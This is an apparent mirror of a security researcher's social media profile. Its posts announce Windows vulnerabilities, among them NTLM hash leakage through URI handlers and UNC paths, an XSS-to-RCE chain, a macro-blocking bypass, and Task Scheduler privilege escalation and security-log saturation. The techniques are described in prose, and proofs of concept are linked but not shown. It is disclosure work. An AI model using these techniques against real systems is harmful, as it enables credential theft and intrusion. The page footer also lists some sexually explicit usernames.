Olivia
Online
Ruben Labs
@RubenLabs
Security Researcher
Joined February 2025
30 Following
245 Followers
19 Posts
New XSS2RCE in Azure Windows Admin Center!
I am happy to share our latest findings, CVE-2026-32196, a critical unauthenticated vulnerability allowing one-click remote code execution.
An attacker can craft a malicious legitimate gateway URL that, when visited by a privileged Azure admin, triggers a response-based XSS in WAC’s error handling.
This results in JavaScript execution under the WAC origin, which translates to arbitrary PowerShell execution on every managed server the victim has access to (no credentials required).
On on-premises deployments, the same chain allows theft of Azure access and refresh tokens from local storage, enabling full tenant impersonation and lateral movement into EntraID and Azure.
Full blog:
https://t.co/wt6MV0qFY1
That is exactly the Microsoft @msftsecresponse silent patch, which isn’t enough, and without a proper CVE.
Instead of a single « open photos » prompt they added another one asking if the server is trusted.
I am now working on reporting to @googlechrome @firefox and @brave to understand what steps they will take to patch it, since when a browser allows such behaviours it exposes users to a CWE-939 (Improper Authorization in Handler for Custom URL Scheme) and a CWE-668 (exposure of resources to the wrong sphere) vulnerabilities.
I will write a new blog post to publish their response.
I found a new one click NTLM leakage vulnerability / technique from a browser.
A web server can redirect a client to a ms-photos URI handler followed by a fileName parameter. If the parameter value is a UNC path instead of a local path, photos.exe will leak the client’s NTLMv2-SSP hash, enabling relay attacks or offline cracking.
Leaking hashes from URI handlers is not new, but combined with a browser redirection, it allows moving from website infection to capturing NTLMv2-SSP hashes (supply chain attack).
No LLMNR is required, and except if the firewall blocks outbound SMB queries, the hash will leak to public facing SMB servers.
The vulnerability can be combined in a supply-chain attack, by infecting public facing applications.
MSRC will not release a patch for this issue.
Find more details with a POC here:
https://t.co/2gMKtGZfQt
@RubenLabs FYI just did a Weekly Purple Team episode on your NTLMv2 zero day. https://t.co/zJxi8Hyaks Check it out!
@BriPwn Excellent video explaining the vulnerability! Nice work!
Read my new blog about blockchain EtherHiding here
Is Web3 the new C2?
Read my blog about EtherHiding, an emerging method that abuses public blockchains as malware infrastructures by embedding payloads into smart contracts.
It provides attackers with decentralized payloads evading takedown & defense.
https://t.co/u5NzaqpA4h
Is Web3 the new C2?
Read my blog about EtherHiding, an emerging method that abuses public blockchains as malware infrastructures by embedding payloads into smart contracts.
It provides attackers with decentralized payloads evading takedown & defense.
https://t.co/u5NzaqpA4h
@pfiatde You are welcome!
I’ll try it soon on a VPS and post an update here. I think that it’ll work anyway.
@davidnaliay Thank you!
Interesting try, but it contradicts the term “local link” in LLMNR. The RFC 4695 itself (see 2.6/b) says:
“If an IPv4 address is returned, it MUST be reachable through the link over which LLMNR is used.”
On intranet also, Microsoft Word remote templates containing macros are blocked by MOTW.
I found a way to bypass it using LLMNR poisoning.
Not my greatest finding but useful for phishing assessment.
MSRC didn’t recognise it.
Details and POC:
https://t.co/hgNFSW2evc
Microsoft patch for our last report - CVE-2025-50154 completely failed and the vulnerability remained unfixed.
Thanks to @0patch for the quick finding and report!
We reported this serious oversight, now tracked as CVE-2025-59214.
Full details: https://t.co/5eO72lAu6B
@lapinousexy Yeah, but they thought they fixed it with CVE-2025-24054, but in fact they didn’t! That’s exactly why I reported it.
Thank you for the precision!
Find the POC for my new finding, CVE-2025-50154, a zero day vulnerability on windows file explorer disclosing NTLMv2-SSP without user interaction. It is a bypass for the CVE-2025-24054 Security Patch.
https://t.co/JKA8zuyYnl
@lapinousexy Yes it is precisely!
With CVE-2025-24054 patch, I thought that what you sent shouldn’t work anymore. But in fact it does.
The reason is that the patch of Microsoft didn’t focus on target path value but on icon path value, blocking only there UNC paths.
You didn’t click, but your password challenge is leaked.
I’m excited to share my latest research: CVE-2025-50154, a high severity NTLM hash disclosure vulnerability in the explorer.exe process, exploitable without any user interaction.
https://t.co/ssA9YdBE6J
Happy to share my newly discovered vulnerabilities on Microsoft Windows!
- Credentials based UAC bypass, allowing to bypass the highest level
- Task Metadata Poisoning
- Task Event Log Buffer Overflow
- Unprivileged Security Logs Saturation
https://t.co/yAea6QuqG5
@fortraofficial impacket-atexec script can be updated to run commands and overflow the whole content of the 4698 "task created" log, making command and arguments logs unwritable.
Also, logs and task metadata poisoning work remotely using the same method!
Happy to share my newly discovered vulnerabilities on Microsoft Windows!
- Credentials based UAC bypass, allowing to bypass the highest level
- Task Metadata Poisoning
- Task Event Log Buffer Overflow
- Unprivileged Security Logs Saturation
https://t.co/yAea6QuqG5
🔥 One task away from total takeover?
4 local privilege escalation flaws found in schtasks.exe—a core part of Windows Task Scheduler.
Attackers can:
• Bypass UAC
• Run SYSTEM-level commands
• Erase security logs
• Impersonate admins using known passwords.
Fix not yet available.
🔗 Full story → https://t.co/F2zZw80wWA
Last Seen Users on Sotwe
asian women love black guys × bmaf japanese 🇨🇩
Seen from Turkey
❤️ EᴠƖɪ ᴘᴀsɪғ ❤️
なつ。
Seen from Korea
SADECE GÔT PAYLAŞIMI
Seen from Turkey
benim dünyam2
Seen from Turkey
saru
Seen from Australia
Ensest Hikayeler
Seen from Italy
Tanerridge
Seen from Turkey
AmatPorn🍑
Seen from Turkey
மதன்
Seen from India
Most Popular Users
Elon Musk
@elonmusk
240.2M followers
Barack Obama
@barackobama
119.3M followers
Donald J. Trump
@realdonaldtrump
111.6M followers
Cristiano Ronaldo
@cristiano
109.4M followers
Narendra Modi
@narendramodi
106.9M followers
Rihanna
@rihanna
97.4M followers
NASA
@nasa
92.1M followers
Justin Bieber
@justinbieber
90.7M followers
KATY PERRY
@katyperry
87.1M followers
Taylor Swift
@taylorswift13
80.9M followers
Lady Gaga
@ladygaga
72.5M followers
Kim Kardashian
@kimkardashian
69.5M followers
Virat Kohli
@imvkohli
69M followers
YouTube
@youtube
68.6M followers
Bill Gates
@billgates
63.5M followers
The Ellen Show
@theellenshow
62.5M followers
CNN
@cnn
61.9M followers
Neymar Jr
@neymarjr
61.6M followers
X
@x
60.9M followers
Selena Gomez
@selenagomez
60.2M followers